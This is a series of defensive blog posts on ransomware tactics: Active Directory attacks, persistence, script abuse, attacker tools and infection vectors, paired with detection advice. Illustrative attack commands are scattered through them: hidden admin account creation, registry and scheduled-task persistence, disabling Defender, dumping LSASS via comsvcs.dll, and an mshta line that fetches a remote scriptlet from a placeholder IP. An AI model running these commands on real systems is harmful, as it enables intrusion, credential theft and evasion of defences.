Search Results

Active Directory (AD) is the backbone of many corporate networks, providing centralized management of users, devices, and permissions. With its central role, AD has become a prime target for ransomware operators and threat actors seeking higher levels of access and persistence within networks. Why Active Directory? Active Directory is critical for managing network resources, authentication, and security policies. Attackers target AD because compromising it can lead to widespread access, allowing them to move laterally, escalate privileges, and gain control over entire environments. Will not go in depth of AD but few info: Microsoft’s Active Directory (AD) provides a centralized database and services that allow users to connect to networking resources Domains use a Domain Name System (DNS) structure to organize namespaces into logical units. For example, a domain of victimnetwork.local might be set up to contain resources specific to a logical grouping of users, computers, and other objects within the AD database. Domain controllers (DCs) are servers that respond to authentication requests and determine if the requesting users should be provided access to the domain. The DCs in an AD environment may also provide services and protocols such as DNS, Dynamic Host Configuration Protocol (DHCP), and other services that facilitate allowing hosts access to the network or resources provided within Authentication within AD is often carried out via the Kerberos authentication protocol. If you are using a Windows computer on a corporate network, you most likely are connected to AD. The overall AD system provides the domain to which you are connected. In order to be connected to said domain, you must authenticate to the domain. You typically carry out these activities by logging in to your machine using the provided username and password for your domain account. Popular Tools Used in Active Directory Attacks Nltest What It Does : A built-in Windows command-line tool, nltest helps attackers pull domain-related information, such as domain lists and trust relationships. Why It’s Used : It provides attackers with a quick and easy way to perform reconnaissance on the AD environment. AdFind What It Does : Originally developed as an LDAP query tool for IT admins, AdFind has been repurposed by attackers to extract data from AD environments. Why It’s Used : It is highly respected among attackers for its ability to pull detailed AD information, including user accounts, group memberships, and more. BloodHound What It Does : BloodHound is a reconnaissance tool that maps relationships between AD objects, helping attackers identify vulnerable attack paths. Why It’s Used : It provides a graphical interface that makes it easier for attackers to understand the AD environment and find weaknesses to exploit. Mimikatz What It Does : A well-known credential harvesting tool , Mimikatz can extract credentials directly from memory, including passwords, hashes, and Kerberos tickets. Why It’s Used : Mimikatz is a go-to tool for attackers looking to escalate privileges and gain deeper access to the network. Rubeus What It Does : Rubeus is a C# tool focused on Kerberos attacks, such as Kerberoasting and AS-REP Roasting. Why It’s Used : It allows attackers to steal encrypted credentials and crack them offline , often leading to compromised accounts. CrackMapExec What It Does : This versatile post-exploitation tool helps attackers assess and exploit security weaknesses in AD environments. Why It’s Used : CrackMapExec is a powerful tool that simplifies the process of exploiting AD vulnerabilities, making it a favorite among threat actors. Common Active Directory Attack Techniques Now, let's delve into some of the most common AD attacks used by ransomware operators and threat actors. 1. BloodHound and AD Reconnaissance BloodHound is often used after initial access to map out the AD environment. Attackers use a collector called SharpHound to gather information on AD objects, such as users, computers, and groups. Once this data is collected, it is passed to BloodHound, which generates a graphical representation of attack paths using the Neo4j graph database. Detection : Monitor for SharpHound (or any renamed executables) being written to disk (System Event ID 11, via EDR, or manual MFT analysis). Pay attention to the file's original name to spot potential renaming attempts. Look for signs of reconnaissance activity, such as unusual LDAP queries. 2. Kerberoasting Kerberoasting targets service accounts within AD that have a Service Principal Name (SPN) assigned. Attackers request a Kerberos ticket for these accounts, which contains an encrypted version of the account's password. Once the ticket is obtained, attackers attempt to crack the password offline. Detection : Enable "Audit Kerberos Service Ticket Operations" in AD. Monitor for Event ID 4769, focusing on Ticket Options (0x40810000) and Ticket Encryption (0x17 for RC4). Alert on .kirbi file creation (Mimikatz saves tickets with a .kirbi extension). Watch for known Kerberoasting tools like Mimikatz and Rubeus in your environment. Mitigation : Remove SPNs from accounts where possible. Use strong, non-crackable passwords for service accounts (long and high-entropy). Consider using Managed Service Accounts (MSAs) to mitigate the risk.] 3. AS-REP Roasting AS-REP Roasting exploits accounts with Kerberos pre-authentication disabled . In a typical Kerberos authentication process, pre-authentication ensures that the user's password is verified by the Key Distribution Center (KDC) before issuing a ticket. However, if pre-authentication is disabled, attackers can request an AS-REP message without needing to supply a valid password. Detection : Monitor for Event ID 4768, focusing on accounts where the Pre-Authentication Type is 0. Investigate why pre-authentication is disabled for any accounts in your environment. Mitigation : Review accounts with pre-authentication disabled and re-enable it where possible. Ensure that accounts with pre-authentication disabled have strong, non-crackable passwords. 4. DCSync Attack DCSync is a powerful attack that allows an attacker to simulate the behavior of a domain controller (DC) and request replication of AD data. By gaining replication permissions, the attacker can pull password hashes for all users in the domain, including highly privileged accounts like Domain Admins. Detection : Monitor for Event ID 4662 , which indicates that an operation was performed on an AD object. Pay attention to properties associated with Control Access, particularly the following: DS-Replication-Get-Changes DS-Replication-Get-Changes-All DS-Replication-Get-Changes-In-Filtered-Set The following values are the Control Access values important to DCSync attacks: • {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} – DS-Replication-Get-Changes • {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} – DS-Replication-Get-Changes-All • {89e95b76-444d-4c62-991a-0facbeda640c} – DS-Replication-Get-Changes Watch for accounts being granted replication permissions, as this is a key indicator of a potential DCSync attack. Mitigation : Lock down replication permissions and ensure that only necessary accounts have this level of access. Use strong, non-crackable passwords for accounts with replication permissions. Regularly audit accounts with high-level privileges, especially those with replication permissions. Conclusion: Protecting Active Directory Active Directory attacks are a significant threat to organizations, particularly when leveraged by ransomware operators. These attacks can provide attackers with deep access to your network and the ability to spread ransomware across the entire environment. For more in-depth details on some of these attacks, check out this insightful post on DCSync attacks by Jaye , which explores AD replication in detail. https://www.cyberengage.org/post/unveiling-threats-exploring-active-directory-replication-from-non-machine-account-mimikatz-dc-syn Akash Patel Bonus: If you know that conti ransomware group had a documentation leak in 2021, the document basically contained training for affiliates how to conduct attacks (manual was named  CobaltStrike MANUALS v2 Active Directory” Attaching it for you:

In the world of ransomware, persistence is key. Once attackers gain access to a system, their goal is to maintain that access for as long as possible, often without detection. To achieve this, they use a variety of techniques, ranging from post-exploitation frameworks to seemingly legitimate remote monitoring and management (RMM) tools. Let's dive in. Post-Exploitation Frameworks: The GitHub Goldmine GitHub is a treasure trove for cybercriminals, offering a wide array of post-exploitation frameworks that can be easily pulled and deployed. These frameworks are often designed to help attackers establish persistence on compromised systems. Some of the most notorious examples include: Emotet and TrickBot:  These Malware-as-a-Service (MaaS) families are well-known for their persistence techniques. Web Shells:  Ransomware actors are increasingly leveraging web shells, which are scripts dropped onto a web server. These scripts, whether ASPX for IIS or ASP for Apache or Nginx, allow attackers to connect to the system via HTTP/HTTPS and run commands. This method is particularly stealthy, as it blends in with normal web traffic, making it difficult to detect. Learn More:  For an in-depth look at web shells, at this link . RMM Tools: Hiding in Plain Sight Ransomware affiliates are increasingly using RMM tools to establish persistence. These tools, designed for legitimate remote management of systems, can be a double-edged sword. In the hands of an attacker, they blend seamlessly into the victim’s environment, often going unnoticed by IT and security teams. Why RMM Tools Are Dangerous: Legitimacy:  RMM tools are often mistaken for legitimate software, making it easy for attackers to maintain access without raising red flags. Baseline Monitoring:  If your organization doesn't have an approved list of RMM tools integrated with your software management system, it’s time to create one. Establish a baseline and set up alerts for any RMM tools that don't match it. For example, if ScreenConnect is the only approved RMM tool, any other RMM software should trigger an alert. RMM Tool Analysis: Here’s where you can find logs for some common RMM tools: AnyDesk: %PROGRAMDATA%\AnyDesk\connection_trace.txt %PROGRAMDATA%\AnyDesk\ad_svc.trace %APPDATA%\AnyDesk\ad.trace ConnectWise: %SYSTEMROOT%\temp\screenconnect\[version]\ %PROGRAMDATA%\ScreenConnect Client ([fingerprint])\ %PROGRAMFILES(x86)%\ScreenConnect Client ([fingerprint])\ %USERPROFILE%\Documents\ConnectWiseControl\Files\ %USERPROFILE%\Documents\ConnectWiseControl\captures\ TeamViewer: C:\Program Files\TeamViewer\Connections_incoming.txt C:\Program Files\TeamViewer\TeamViewer15_Logfile.log C:\Program Files\TeamViewer\TVNetwork.log %APPDATA%\TeamViewer\TeamViewer15_Logfile.log %LOCALAPPDATA%\Temp\TeamViewer\TV15Install.log Learn More:  For a deeper dive into RMM tool analysis, check out Théo Letailleur’s article on legitimate RATs for more on TeamViewer, AnyDesk, Atera, and Splashtop at this link . The Rise of Post-Exploitation Frameworks Post-exploitation frameworks, both commercial and open-source (FOSS), are commonly used by ransomware actors to establish persistence. Commercial Tools:  Cobalt Strike and Brute Ratel are two of the most popular commercial tools used in ransomware attacks. FOSS Solutions:  Open-source frameworks like the former PowerShell Empire project are also widely used. Even though the original PowerShell Empire project has been archived, a new project called Empire has picked up where it left off . This new project combines the PowerShell Empire and Python EmPyre projects , and it's frequently leveraged in ransomware campaigns. Learn More:  For more details on Empire, check out the project’s web page at this link . Persistence Techniques: Account Creation Attackers use various methods to create new user accounts and add them to privileged groups. The standard tools they use include Command Prompt and PowerShell. Command Prompt Commands: Attackers can use the net user and net localgroup commands to create new user accounts and elevate them to privileged groups. net user SAMAdmim #sorryNOTsorry# /add net localgroup administrators SAMAdmim /add net localgroup "Remote Desktop Users" SAMAdmim /add PowerShell Commands: PowerShell provides cmdlets to achieve the same result in a more scriptable way New-LocalUser -Name "SAMAdmim" -Password (ConvertTo-SecureString "#sorryNOTsorry#" -AsPlainText -Force) -FullName "SAM Administrator" -Description "Admin user" Add-LocalGroupMember –Groups administrators –Member SAMAdmim Add-LocalGroupMember –Groups "Remote Desktop Users" –Member SAMAdmim Event-Based Detection Event ID 4720:  A user account was created.. Event ID 4728:  A member was added to a security-enabled global group. Artifact-Based Detection In addition to monitoring event logs, examining filesystem artifacts can help identify unauthorized account creation. Creation Timestamps: When a new user account is created, a corresponding directory is created under C:\Users\[User]. Reviewing the creation timestamp of this directory can reveal when the account was created, which can be useful for timeline analysis. NTUSER.DAT Registry Hive: Each user account has an associated NTUSER.DAT registry hive that stores user-specific configuration data. Investigating the creation timestamp and contents of this file can provide further evidence of unauthorized activity. 2. Boot/Logon Autostart The most common persistence methods used by threat actors and malware, focusing on techniques that have been prevalent since the 1990s. Ransomware operators, in particular, frequently employ these methods to maintain control over infected systems. Run Keys (Registry-based Autostart Entries): Run and RunOnce Keys  are frequently used for persistence by malware. These registry keys allow applications to be executed automatically when a user logs in. Example path: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Run These keys are some of the oldest and most widely abused mechanisms, and they still remain popular among modern threat actors, including ransomware operators. Startup Folder: Placing shortcuts or scripts in the startup folder ensures that the malware will be executed whenever the user logs into Windows. Example path: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup Winlogon: The Winlogon process is responsible for handling user logons. By modifying specific registry values, attackers can execute code during the logon process. Two popular values within the Winlogon key are Userinit and Shell. Example path: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon This method is stealthier than Run keys, as it directly ties into the user authentication process. SilentProcessExit: This method leverages a registry key that allows the configuration of an action to be executed when a specific process exits. For example, the following command creates persistence by launching rundll32 to execute a function from a malicious DLL whenever Notepad is closed. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "c:\windows\system32\cmd.exe rundll32.exe c:\users\public\music\not_a_beacon.dll,Control_runDLL" This method allows malware to stay hidden until a seemingly benign process, like Notepad, exits. MITRE ATT&CK Framework: Autostart Locations The MITRE ATT&CK framework provides a detailed list of common autostart locations, which are frequently abused for persistence. You can find an extensive catalog of these techniques at MITRE ATT&CK - T1547.001 . Some of the most notable locations include: Startup Folder: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup RunOnceEx Key: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx Explorer User Shell Folders: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Shell Folders: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders These autostart locations are often the first place incident responders and forensic analysts check when hunting for signs of persistence. 3. Services and Their Role in Ransomware Persistence In most ransomware attacks, the installation of services plays a critical role in ensuring persistence. Services allow ransomware to continue running in the background, often with elevated privileges. How Services Work in Windows A service in Windows is a background process that typically starts when the computer boots and runs without user interaction. These services are managed using commands like sc or net, or via PowerShell cmdlets like Get-Service and Stop-Service. Event IDs to Monitor for Services PE (Portable Executable): This is a file format used by Windows for executables, DLLs, and others. However, not all PE files are capable of running as a service. They need to be specifically designed with the necessary code to interact with the Windows Service Control Manager (SCM) to start, stop, and handle service-related commands. Example: A regular application like notepad.exe is a PE file , but it cannot run as a service because it doesn't have the necessary code to function as a service. Service Handlers and ImagePath ImagePath: When you define a service in the Windows registry, one of the keys associated with the service is the ImagePath. This key points to the executable file on disk that handles the service. Example: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MyService ImagePath = "C:\Program Files\MyService\MyService.exe" NSSM (Non-Sucking Service Manager) The Non-Sucking Service Manager is a tool that allows you to run any executable as a service, even if that executable was not designed to run as one. Why is this important for adversaries? Regular malware executables (PE files) are not designed to run as services . However, using NSSM, attackers can force these malware files to run as a service, allowing the malware to start automatically when the system boots and run in the background without user intervention. Example of NSSM Usage: Let's say an attacker has a malicious executable named malware.exe . Normally, malware.exe is just a regular PE file and cannot run as a service. By using NSSM, the attacker can create a service that uses malware.exe as the service handler: nssm install MyMalwareService "C:\Path\To\malware.exe" This command tells NSSM to install malware.exe as a service named MyMalwareService. Now, every time the system boots, malware.exe will run as a service, making it harder to detect and remove. 4. Scheduled Tasks: In many ransomware attacks, scheduled tasks are commonly employed as a method of persistence. Attackers use tools like schtasks.exe to automate the execution of malicious code at specific intervals or events, ensuring that their malware remains active on the system even after a reboot. Example of a Malicious Scheduled Task Threat actors often use the schtasks.exe command to create malicious tasks. For example, cmd.exe /c schtasks /f /create /ru samadmin /sc ONLOGON /tn "\Microsoft\windows\XBox" /tr "%COMSPEC% /c %APPDATA%\42.exe" This command creates a scheduled task named "samadmin" in the \Microsoft\windows\XBox container. The task is set to trigger upon user logon (/sc ONLOGON) and runs the file located at %APPDATA%\42.exe. Essentially, every time the user logs in, the malicious executable (42.exe) is executed.\ Event-Based Detection: Registry and File System Artifacts Windows stores scheduled task information in various locations within the system. Registry Keys: SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tasks SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tree Task Definitions on Disk: C:\Windows\System32\Tasks\ Each task in Windows is defined by an XML file stored in this directory. These XML files describe the task's behavior, including the program to be executed, the trigger conditions, and the user context under which the task runs. When conducting a forensic investigation, it is crucial to collect all files from this directory, as they provide detailed information about the scheduled tasks on the system 5. WMI Event Subscription: Stealthy Persistence Technique Windows Management Instrumentation (WMI) is a powerful framework used for managing data and devices in a Windows environment. Unfortunately, threat actors have recognized WMI's capabilities and have been leveraging it for stealthy persistence. WMI subscriptions rely on three main components: Filters:  Define the conditions under which the subscription will trigger. Consumers:  Define the action or command to execute when the subscription triggers. Binders:  Link the filter and consumer together, creating a fully functional WMI subscription Example WMI Event Subscription Suppose an attacker wants to execute malicious code whenever the system reaches a certain uptime. The filter defines the condition (system uptime), and the consumer specifies the malicious code to execute: Filter:  Monitors system uptime and triggers when the uptime is between 240 and 325 seconds. Consumer :   Executes LegitUpdater.exe from the C:\Windows\Temp\ directory when the filter condition is met. With this setup, the malicious code is executed in the background whenever the system uptime condition is satisfied, allowing the attacker to maintain persistence without detection. Further Reading on WMI Persistence For a deep dive into WMI's capabilities and persistence techniques, I have created an extensive series of blog posts covering various aspects of WMI: Part 1: WMI – A Deep Dive into its Capabilities and Stealthy Persistence Techniques Part 2: WMI – Detecting and Defending Against WMI-based Attacks Part 3: WMI – Understanding WMI Event Consumers in Cybersecurity Part 4: WMI – The Intricacies of MOF Files: A Gateway for Malicious Infiltration in WMI Part 5: WMI – Unveiling the Persistence of Malicious MOF Files: A Deep Dive into PRAGMA AUTORECOV Part 6: WMI – Hunting Down Malicious WMI Activity For more detailed insights into WMI event consumers, you can also explore Matthew Green’s article, "WMI Event Consumers: What Are You Missing?"  available in the Velociraptor project documentation here . Conclusion Persistence techniques are a cornerstone of many ransomware attacks and other forms of malware, allowing adversaries to maintain their foothold on compromised systems.. Each technique presents its unique challenges for detection, but by understanding how these methods work and regularly monitoring key system artifacts—such as registry entries, scheduled tasks, services, and WMI subscriptions—security professionals can identify and mitigate persistence mechanisms before they escalate into more significant threats. Akash Patel

Ransomware attacks have become increasingly sophisticated, leveraging every tool at their disposal to wreak havoc. Among these tools, scripting languages like PowerShell, batch scripts, JavaScript, and Visual Basic scripting have become favorites for attackers. These languages are powerful and versatile, making them ideal for automating tasks, but in the wrong hands, they can be used to execute some pretty nasty stuff. PowerShell: A Double-Edged Sword PowerShell is a powerhouse in the world of scripting. It's like the Swiss Army knife of Windows, capable of doing almost anything from managing files to interacting with the Win32 API and .NET framework assemblies. This flexibility is a boon for system administrators, but it also makes PowerShell an attractive tool for cybercriminals. Why Ransomware Loves PowerShell: Post-Exploitation Frameworks:  Tools like Empire and PowerSploit are written in PowerShell, allowing attackers to execute a wide range of post-exploitation activities. Obfuscation:  Daniel Bohannon’s Invoke-Obfuscation   project makes it easy to hide malicious PowerShell commands. Combine this with his DOSfuscation techniques , and you’ve got a recipe for highly obfuscated, hard-to-detect scripts. Elastic Syntax:  PowerShell’s flexible parameter syntax means attackers can shorten commands, making them less obvious in logs. For example, instead of using -ExecutionPolicy Unrestricted, an attacker might just use -ex Unrestricted. PowerShell Logging: Tracking PowerShell Misuse: PowerShell isn’t just powerful for attackers; it’s also great for defenders. For example, the PSReadLine module in PowerShell keeps a history of commands for each user. This can be a goldmine when investigating an attack, especially if the attacker’s credentials are captured in the history. You can find these history files at: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt Batch Scripts: The Silent Executors Batch scripts might seem old school, but they’re still a favorite among ransomware authors. These .bat files can be incredibly sneaky, often executing without leaving much of a trace. What Makes Batch Scripts Dangerous: Lack of Default Logging:  By default, Windows doesn’t log batch script execution. This means that unless you’ve enabled process auditing or have an EDR solution in place, you might not even know a script has run. Self-Destruction:   Batch scripts can delete themselves after execution, making it harder to track what happened. I magine a PE file dropping a batch script that deletes the original file and then itself—tricky to trace, right? Where to Look: Keep an eye on Shimcache, where batch files might leave a trace even after they’ve deleted themselves. JavaScript and Visual Basic: Not Just for the Web Most people think of JavaScript as the language of the web, but did you know that Microsoft’s Windows Script Host (WSH) can also run JavaScript on your local machine? This is done through wscript.exe, which executes .js files. How Attackers Use JavaScript: Direct Execution:  Attackers can run JavaScript files directly using the CLI version of WSH (cscript.exe), making it easy to execute scripts with a double-click. Obfuscation and Malicious Code:  Just like PowerShell, JavaScript can be obfuscated to hide malicious intent. Attackers often use this to bypass detection mechanisms. Learn more about Microsoft’s JScript at https://en.wikipedia.org/wiki/JScript . Learn more about ECMAScript at https://en.wikipedia.org/wiki/ECMAScript . Conclusion: Staying One Step Ahead Ransomware isn’t going away anytime soon, and as defenders, we need to stay vigilant. By understanding how scripting engines are abused, we can better prepare ourselves to detect and respond to these threats. Whether it’s through enabling logging, monitoring specific directories, or simply staying informed, every little bit helps in the fight against ransomware. So, the next time you see a suspicious script running on your network, don’t brush it off. It might just be the tip of the iceberg. Akash Patel

Ransomware actors have increasingly shifted their tactics, techniques, and procedures (TTPs) to include the use of legitimate commercial and open-source software rather than relying solely on their custom-built webshells or malware. This shift is often referred to as "Bring Your Own Tools" (BYOT), where threat actors use trusted and widely available tools for malicious purposes. Ransomware Actors' Arsenal: From Webshells to Commercial Tools Ransomware actors are now using a variety of free, commercial, and open-source software in their attacks. Some of the most commonly used tools include: BloodHound : A tool that identifies and exploits misconfigurations in Active Directory environments. WinSCP : A popular free SFTP, FTP, WebDAV, and SCP client. PoshC2 : A command and control framework that is often used for post-exploitation. Cobalt Strike : A commercial adversary simulation tool used to emulate advanced threats. Brute Ratel : A red-teaming tool designed to evade detection by EDR and AV solutions. AdFind : An LDAP query tool used to gather information from Active Directory. These tools are often utilized by ransomware operators to move laterally, gather intelligence, and escalate privileges within a compromised environment. The Darknet Marketplace: Where Exploits and Tools Are Sold If you explore darknet forums, you’ll find that commercial tools like CANVAS, Cobalt Strike, and Core Impact are often available for sale. These tools, originally developed for legitimate purposes such as penetration testing, are being weaponized by ransomware groups to compromise networks. Example of a Darknet Forum Selling Exploits BYOT: Bring Your Own Tools The BYOT approach is now a staple in ransomware campaigns. By utilizing cloud-based file-sharing sites like Google Drive, Dropbox, and Box, threat actors can easily bring these tools into a target environment without raising suspicion. It’s crucial for organizations to block and alert on these domains to prevent such tactics. Monitoring & Alerting Domains/URLs : 7zip : Download AdFind : Download Advanced IP Scanner : Download Angry IP Scanner : Download AnyDesk : Download Procdump : Download Process Hacker : Download PsTools/PsExec : Download rclone : Download WinSCP : Portable  | Full Commonly Accessed GitHub Repositories : BloodHound : Releases Lazagne : Releases Mimikatz : Releases PowerSploit/PowerView : Releases PowerUp : Releases Rubeus : Source  | Binary Seatbelt : Source  | Binary SharpView : Compiled Living Off Trusted Sites (LOTS) Project : mrd0x maintains the Living Off Trusted Sites (LOTS) Project , cataloging sites used frequently for BYOT, data exfiltration, phishing, and other malicious activities. It’s essential to monitor and alert on such domains to prevent and detect these activities. Bypassing Security Software Once attackers gain initial access, they often need to disable security mechanisms to execute their payloads. Disabling real-time monitoring in Windows Defender, for instance, can be done easily if the attacker has admin privileges: Set-MpPreference -DisableRealtimeMonitoring $True Unfortunately, many organizations do not monitor for invocations of Set-MpPreference. With the ease of disabling Defender's real-time monitoring, it becomes clear why having a robust backup solution is critical. Common Bypass Tools & Techniques : GMER, Hitman Pro, PC Hunter, Process Hacker : Tools used to disable security mechanisms. Process Hacker, for example, can identify and disable security product services, loaded libraries, and more. BYOVD (Bring Your Own Vulnerable Driver) : This involves bringing a signed kernel driver into the environment that is vulnerable to attack, providing a low level of access for disabling security mechanisms such as AV, EPP, and EDR services. Common Drivers Used in Ransomware Attacks : aswArPot.sys  (Avast) gdrv.sys  (Gigabyte) mhyprot2.sys  (Genshin Impact) DLL Hijacking : Wietze Beukema's Hijack Libs  project offers an overview of DLL Hijacking, where legitimate DLLs are replaced or hijacked by malicious actors. LOLBAS commands: Rather than use a dedicated tool to find and kill security product services and processes, the LOLBAS commands sc, net, and taskkill can do the job: Service Identification and Termination : sc Command : Example: sc stop [service_name] can be used to stop a specific service. net Command : Example: net stop [service_name] will halt the identified service. Process Identification and Termination : Task Manager and tasklist Command : Once a process is identified, taskkill can be used to stop it. PowerShell Cmdlets : Get-Service/Stop-Service : These cmdlets allow administrators (and attackers) to query and stop services, respectively. Get-Process/Stop-Process : These cmdlets are used to query and terminate running processes. LOLBINs & Native Execution Methods Ransomware actors often use legitimate binaries, also known as LOLBINs (Living Off the Land Binaries), to execute malicious commands: regsvr32 : Registers DLLs. rundll32 : Executes functions directly from DLLs. bitsadmin : Administers the Background Intelligent Transfer Service (BITS). msbuild : CLI compiler for Visual Studio. msiexec : Windows Installer for installing programs and tools. mshta : Executes HTML Applications (HTA) code. winrs and wmic : Used for remote command execution. wsl : Windows Subsystem for Linux, abused for execution and persistence. Example Commands : 1. cmd.exe /k [malicious command] 2. powershell.exe -c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 4242 C:\WINDOWS\TEMP full 3. regsvr32 c:\users\public\legit.dll 4. mshta.exe vbscript:Close(Execute("GetObject("script:http://1.1.1.1/not_malicious.sct")")) Windows Management Instrumentation (WMI) WMI has been around for many years and is commonly used by ransomware actors for persistence and lateral movement. Below are the key components and methods associated with WMI in ransomware cases: Key WMI Components : wmic.exe : General CLI tool to interact with WMI. wmiprvse.exe : Service handling WMI commands, often seen in remote WMI activity. wsmprovhost.exe : Runs on the remote host if PSRemoting is used. mofcomp.exe : MOF (Managed Object File) compiler used to insert data into the WMI database. WMI Commands : wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List WMI is often used by ransomware actors to launch processes with "Medium" integrity. Some malware calls itself using WMIC via process call create [bad_stuff_here] to elevate privileges on the system. Detecting WMIC Execution : To detect WMI-based attacks, monitor processes launched by WMIC with medium integrity and unusual invocations. For detailed WMI analysis, collect the WMI database files located at %SystemRoot%\System32\Wbem\Repository\. Enable WMI Tracing : Wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true WMI Course: A Deep Dive I’ve created an in-depth course on WMI, covering its capabilities, stealthy persistence techniques, and how to detect and defend against WMI-based attacks. Check out the full course below: https://www.cyberengage.org/post/part-1-wmi-a-deep-dive-into-its-capabilities-and-stealthy-persistence-techniques https://www.cyberengage.org/post/part-2-wmi-detecting-and-defending-against-wmi-based-attacks https://www.cyberengage.org/post/part-3-wmi-understanding-wmi-event-consumers-in-cybersecurity https://www.cyberengage.org/post/part-4-wmi-the-intricacies-of-mof-files-a-gateway-for-malicious-infiltration-in-wmi https://www.cyberengage.org/post/part-5-wmi-unveiling-the-persistence-of-malicious-mof-files-a-deep-dive-into-pragma-autorecov https://www.cyberengage.org/post/part-6-wmi-hunting-down-malicious-wmi-activity Akash Patel

Ransomware attacks have become increasingly sophisticated, with threat actors leveraging various infection vectors to gain initial access to systems. In this blog, we'll explore three critical infection vectors: RDP (Remote Desktop Protocol) , vulnerabilities , and phishing . Understanding these vectors and how they are exploited is crucial to preventing ransomware attacks. 1. Remote Desktop Protocol (RDP) Why is RDP a Major Threat? Lack of Awareness : Many organizations do not fully recognize the threat posed by open RDP services. Critical Servers at Risk : RDP is often left open on critical servers, making them easy targets. Weak Security Measures : Common issues include weak password policies, no Multi-Factor Authentication (MFA), and no lockout policies. Key Consideration : Any RDP service exposed to the internet will face constant brute-force attacks. Organizations often avoid lockout policies to prevent legitimate accounts from being locked out, but this opens the door to attackers. Tracking RDP via Event Logs Use event IDs to monitor RDP activity. Common event IDs associated with RDP use include. Restricting RDP Activity Group Policy Objects (GPOs) : Disable RDP on hosts where it is not required. Firewall Rules : Implement rules to block inbound and outbound RDP traffic based on both port numbers and detected application protocols. Security Policies : Establish and enforce policies that prohibit unnecessary RDP use. Verification : Check firewall logs and Windows event logs, especially from an external to internal perspective, to ensure RDP restrictions are effective. 2. Exploiting Vulnerabilities Understanding Zero-Day Attacks What is a Zero-Day? : A zero-day vulnerability is an unknown flaw in software with no available patch. However, once a patch is available, it stops being a zero-day. Case Study - REvil and Kaseya (2021) : The REvil group exploited zero-day vulnerabilities in Kaseya's software, leading to widespread attacks. Why Are Exploits Successful? Slow Patch Cycles : Organizations often take too long to patch vulnerabilities. Poor Asset Management : Many companies lack a solid asset management system, leading to unpatched devices and services. Abandoned Services : Unused and unpatched services create easy entry points for attackers. Example of Exploits : The Log4Shell vulnerability in 2021 highlighted how unmonitored third-party libraries can become major security risks. Resources : Track the most exploited vulnerabilities via below link. https://github.com/fastfire/deepdarkCTI/blob/main/cve_most_exploited.md Identification : Look for “contextual evidence” when identifying vulnerability exploitation as the infection vector. For example, non-related process running under a service-related process is a red flag. Service- and appliance-related processes serving as parents for non related processes is a bad sign. 3. Phishing - The Most Common Infection Vector How Phishing Works Email Attacks : Phishing emails aim to deliver malware or harvest credentials. Attackers often bypass MFA by using stolen credentials to log in to remote services like VPNs and RDP. Malspam Campaigns : These campaigns rely on sheer volume to succeed. Emails may contain malicious attachments (maldocs) or links designed to download malware. Hunting for Phishing Attachments Web Browsers : Analyze web browser artifacts using tools like DB Browser  to identify downloaded files. Outlook Content : Cached emails and attachments in Outlook are valuable for hunting phishing artifacts. Malicious processes launched from Office applications are often a tell-tale sign. (/inetcache/content.outlook/) Windows Explorer : Look for evidence of ZIP files opened by users, which may contain malware. Windows Registry : The Windows Registry is a veritable cornucopia of data pertaining to user actions within the operating system. If a user opens a maldoc, they may be required to enable macros. Unsurprisingly, many users take this action without question. When they do, the action is logged in the “Trusted Documents” section of the Registry. Phishing Links Direct Downloads : Some phishing emails bypass DNS-level protection by using direct IP addresses or URL shorteners ( e.g., bit.ly, tinyurl ). File Sharing Sites : Attackers often use legitimate file-sharing sites like Google Drive or Dropbox to host malicious content, making detection harder. Mitigation : Organizations should block or at least monitor access to file-sharing sites and flag suspicious activity. Additional concepts: The Role of CVEs and Exploit Code in Ransomware Campaigns Newly Announced CVEs : Darknet Discussions : Newly disclosed CVEs are often discussed on darknet forums, where threat actors share and sell exploits. Rapid Spread of POC Code : In today's digital age, Proof of Concept (POC) code spreads quickly on public platforms like GitHub and private channels alike. It's not uncommon for ransomware actors to log into a victim's network, open a web browser, and download tools or POC code from GitHub the same day it becomes available. Exploits for Sale : Darknet Marketplaces : While some security researchers publish POC code publicly, threat actors often develop and sell exploit code on darknet marketplaces. Occasionally, researchers purchase this code to bring awareness to the threat, but this also highlights the accessibility of such exploits to malicious actors. Example - PrintNightmare : Commodity Malware and Malware as a Service (MaaS) Commodity Malware : Infostealers : These are commonly used in ransomware attacks to gather information and lay the groundwork for further exploitation. MaaS : MaaS has become a significant tool in ransomware campaigns. Originally starting as "banking trojans" or "info stealers," these tools have evolved into what are now often referred to as "loaders," capable of delivering additional payloads onto a compromised machine. Emotet : A Notorious Example : Emotet, one of the most well-known MaaS families, had a significant impact on the cyber threat landscape. After a law enforcement raid led to its temporary disappearance, the group re-emerged in mid-2022, revamping its operations. Cryptolaemus : A group of researchers known as "Cryptolaemus" has dedicated itself to combating the Emotet threat. They regularly post information on Emotet campaigns, including IPs and URLs they have detected. https://x.com/Cryptolaemus Resource for Live Malware Samples : For live samples of various MaaS families and loaders, https://github.com/jstrosch/malware-samples Conclusion Understanding these infection vectors is crucial for building robust defenses against ransomware. By focusing on key areas such as RDP, vulnerabilities, and phishing, organizations can significantly reduce their risk of falling victim to these attacks. Regular monitoring, patching, and enforcing strict security policies are essential steps in this process.

